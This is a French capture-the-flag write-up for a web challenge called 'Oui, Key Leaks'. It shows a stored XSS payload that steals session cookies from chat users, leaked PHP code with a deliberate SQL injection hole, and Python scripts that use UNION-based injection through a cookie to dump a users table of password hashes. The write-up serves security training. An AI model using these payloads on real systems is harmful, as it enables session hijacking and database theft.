Oui, Key Leaks

Flag: ECW{M4stery_Of_All_T3chniques_gg}

Challenge

Description

OuiKeyLeaks have been seized for publishing a bad article about drones!

Out of curiosity, can you help us pentesting this website ? Try retrieving the admin's password hash.

_Spoiler : It's going to take some escalation ! Have fun. _

Challenge made by:

Ce challenge tourne sur un docker et n'est pas disponible

Solution

Accèder au site

Pour accèder au site, il faut avoir le cookie magic_cookie=investigator. On le voit dans le code source du la page :

Retirer les pubs (confort)

Bon, c'est plutôt embêtant les popups toutes les 5 secondes.

Dans le fichier /js/ads.js, on trouve le cookie premium qu'il faut mettre à "true" pour empêcher cela.

XSS

Il y a une fonction de chat sur le site. Les messages reçus sont directement injectés dans l'HTML avec la l'attribut innerHTML. C'est là qu'on peut injecter des éléments qui seront interprétés et donc exécuter du JS.

Donc dès qu'un autre utilisateur se connecter, on leak ses cookies en envoyant le payload :

<img src=x onerror="socket.emit('message', document.cookie)"/>

Maintenant on a le cookie : guid=51af8760-3cbf-4344-bcba-7f142d3157e7

On accède au panneau admin en cliquant sur le titre du site

Sur le panneau /admin, on peut voir les logs du serveur. On va les analyser avec un LLM pour aller plus vite.

Nouvel endpoint : /admin/notes.txt. Dessus on trouve une partie du code du serveur. Celle-ci est vulnérable.

TODO : 

Gotta implement some temporary validation dor investigators : done
Using rev nginx : done
SQL is so easy : yes
No time for guid validation with nginx, todo later
Make admins able to change password : done
email notifs: done
Dark Light themes : useless really + web dev, won't do

Rebrand to something else than Oui Key Leaks like idk... The Pi rat's babe or something, sounds good



______________________________________________ What to do if you are under investigation __________________________________________________

If you are under investigation, the first step is to contact a lawyer immediately.
 Avoid speaking to the police or signing any documents without legal advice.
 A lawyer can help manage the situation and prevent it from worsening.
 They can also conduct their own investigation to uncover evidence that might prove your innocence.
 It is crucial to act quickly, as certain avenues of investigation may close once you are charged.
 Understanding your legal rights and ensuring you do not make any incriminating mistakes is essential.

_______________________________________________ How to find a good lawyer __________________________________________

Finding a good lawyer involves several steps to ensure you find someone who can effectively handle your legal needs. First, consider the type of legal services you require and whether you need a general practice attorney or a specialist in a specific area of law.

Personal referrals from friends, family, or colleagues who have faced similar legal issues can provide valuable insights into a lawyer's competence and communication style.
 Additionally, you can consult with your local or state bar association, which often provides lawyer referral services.

Online resources like Avvo and Lexpert offer directories of lawyers with client reviews, bar data, disciplinary records, and peer endorsements, allowing you to research potential candidates.
 These directories can help you narrow down your choices based on practice area and location.

TODO eventually :
Test security, especially the guid cookie, I hard vibed that code a little too hard maybe
Buy new coffee machine
I should try OSCP, I'm good at security
I should check if the guid is valid instead of simply checking if the user has a guid set
Check again if I successfully deleted all illegal files from server

Base64: J1lvdSdyZSBvbiB0aGUgcmlnaHQgcGF0aCwgZW5qb3lpbmcgdGhlIGNoYWxsIHNvIGZhciA/IExldCBtZSBrbm93IG9uIERpc2NvcmQgOyknIElsbF9MYWtlIG9yIE5vZHJvZyBOYW1lZXJm

my slapped code to be reworked : 

<?php
header("Content-Type: application/json");
require_once '../config/config.php'; // Connexion PDO

// Check if guid is present
if (isset($_COOKIE['guid'])) {
    $guid = $_COOKIE['guid'];

    $query = "SELECT name, secret FROM users WHERE guid = '$guid'"; 
    $result = $pdo->query($query);
    $userData = $result->fetch(PDO::FETCH_ASSOC);

    if ($userData) {
        echo json_encode([
            "success" => true,
            "name" => $userData['name'],
            "secret" => $userData['secret']
        ]);
    } else {
        echo json_encode(["success" => false, "message" => "Unknown GUID"]);
    }
} else {
    echo json_encode(["success" => false, "message" => "No guid found..."]);
}
?>

TODO also, make sure nobody can see this file

Injection SQL

Pour utiliser la fonction donc on connaît le code, il faut aller sur /admin/api/user.php. On peut le voir dans les requêtes effectuées par le site et en comparant le retour obtenu avec ce que le code est censé nous renvoyer (un json contenant les infos du user).

On va l'injecter pour récupérer le nom de toutes les colonnes.

import requests

HOST = "challenges.challenge-ecw.eu"
PORT = 34993
URL = f"http://{HOST}:{PORT}"

def inject(payload):
  cookies = { "guid": payload }
  response = requests.get(f"{URL}/admin/api/user.php", cookies=cookies).json()
  return None if not response["success"] else response

print(inject("' UNION SELECT 1,GROUP_CONCAT(0x7c,column_name,0x7C) FROM information_schema.columns WHERE table_name='users' #"))
{'success': True, 'name': '1', 'secret': '|USER|,|CURRENT_CONNECTIONS|,|TOTAL_CONNECTIONS|,|id|,|name|,|password_hash|,|guid|,|secret|,|email|,|email_notifications|,|created_at|'}

Et maintenant, go dump toute la table :

import requests

HOST = "challenges.challenge-ecw.eu"
PORT = 34993
URL = f"http://{HOST}:{PORT}"

def inject(payload):
  cookies = { "guid": payload }
  response = requests.get(f"{URL}/admin/api/user.php", cookies=cookies).json()
  return None if not response["success"] else response

i = 0
while True:
  data = inject(f"' UNION SELECT CONCAT(id,'|',name,'|',password_hash,'|',guid,'|',secret,'|',email,'|',email_notifications),1 FROM users LIMIT 1 OFFSET {i} #")
  if data is None:
    break
  print(f"[{i: >2}] {data}")
  i += 1
[ 0] {'success': True, 'name': '1|John "Bulldog" McCallister|$2y$10$ipPMkhDUiTLrFBkhBiOTOu69zLax36uWgNUfEs029lNR4w1eH6GgO|f05b824d-a5f2-4380-85b5-df075a36b2f2|Always beware of coincidences.|[email protected]|1', 'secret': '1'}
[ 1] {'success': True, 'name': '2|Sarah "Shadow" Thompson|$2y$10$ipPMkhDUiTLrFBkhBiOTOu69zLax36uWgCAfEs029lNR4w1eH6GgO|f17723cf-4d99-46d4-987d-72161cad37db|An unlit cigarette tells as much as a witness.|[email protected]|1', 'secret': '1'}
[ 2] {'success': True, 'name': '3|Frank Ramirez|$2y$10$ipPMkhDUiTLrFBkhBiOTOb54zLax36uWgNUfEs029lNR4w1eH6GgO|51af8760-3cbf-4344-bcba-7f142d3157e7|The perfect crime does not exist. Only inattentive cops.|[email protected]|1', 'secret': '1'}
[ 3] {'success': True, 'name': '4|Lisa "Fox" Bennett|$2y$10$zKk2Mf5Du87d9vTA9u691.v8KZfWWiCoKf7iMoG5QC5Mv4USUCaoO|ec88110c-0f24-410f-a900-5d2ef92325bf|Q2hhbGxlbmdlIG1hZGUgd2l0aCBsb3ZlIGJ5IElsbF9MYWtlIDsp|[email protected]|1', 'secret': '1'}
[ 4] {'success': True, 'name': '5|Mike "Rust" Calloway|$2y$10$Vtz8.73vr3CE4LqSoNdGS.wNk12OFxT/fYOdqGBDoyDZthX7Qk1Tq|5f48101b-a80c-495c-acda-0af9acb096a9|Everybody lies. Except the dead.|[email protected]|1', 'secret': '1'}
[ 5] {'success': True, 'name': '6|Olivia "Ice" Carter|$2y$10$SQDfu2ELK5dLWiSwrKyfnuZbHlc9UtOrb9CtV8dZP4Hqft6Gs0Yxa|eaa8424e-036c-408b-a53e-97e7b6daa96e|When a suspect smiles, they are either innocent or very guilty.|[email protected]|1', 'secret': '1'}
[ 6] {'success': True, 'name': '7|David "Eagle" Hunt|$2y$10$5BAizbuTJ6bbsRUNzx3GQeQzQKRYfw11g/3MxoqjBx0WKR99oYm3y|8e4d47de-6510-4766-86d8-f22dc7adf073|Truth is just a matter of perspective.|[email protected]|1', 'secret': '1'}
[ 7] {'success': True, 'name': '8|Vincent "Old Dog" Marconi|$2y$10$rP/wBG44Ll7yqg0TtgewjOhwDJJNqWVwVbdnwz0B5XXoqk.Iku.dG|af169487-9e4b-4efa-8819-0f4eb6708ef8|Modern criminals make digital mistakes.|[email protected]|1', 'secret': '1'}
[ 8] {'success': True, 'name': '9|Emma "Torch" Sinclair|$2y$10$30pQ1VLUPT2Dv6tGyxuXtui/5PJfIkxzbWEl1JtnJ6Mk6MB5BOlI2|247c2be7-d1d0-453f-aaa6-bfaed5263318|Shadows talk. You just need to know how to listen.|[email protected]|1', 'secret': '1'}
[ 9] {'success': True, 'name': '10|Rick "Grim" Holloway|$2y$10$QrJoRuJQN7sWvhpYCuYfduy.UMdUdquF0.O6xcsRtxS11m5RMwaaS|78a640a6-457a-4d3c-8ba7-ecfaa8a1bfc8|The best clues are the ones you do not want to see.|[email protected]|1', 'secret': '1'}
[10] {'success': True, 'name': '11|Luniaj Ensagas - Admin|ECW{M4stery_Of_All_T3chniques_gg}|2a4b62d9-7a4c-4938-9f97-1337cafebabe| (proudly) I always hide my flags is my db password fields !|[email protected]|1', 'secret': '1'}

Le flag est dans le dernier user, dans la colonne password_hash.

PrécédentDeepDoveSuivantTacticool Bin

Mis à jour

Ce contenu vous a-t-il été utile ?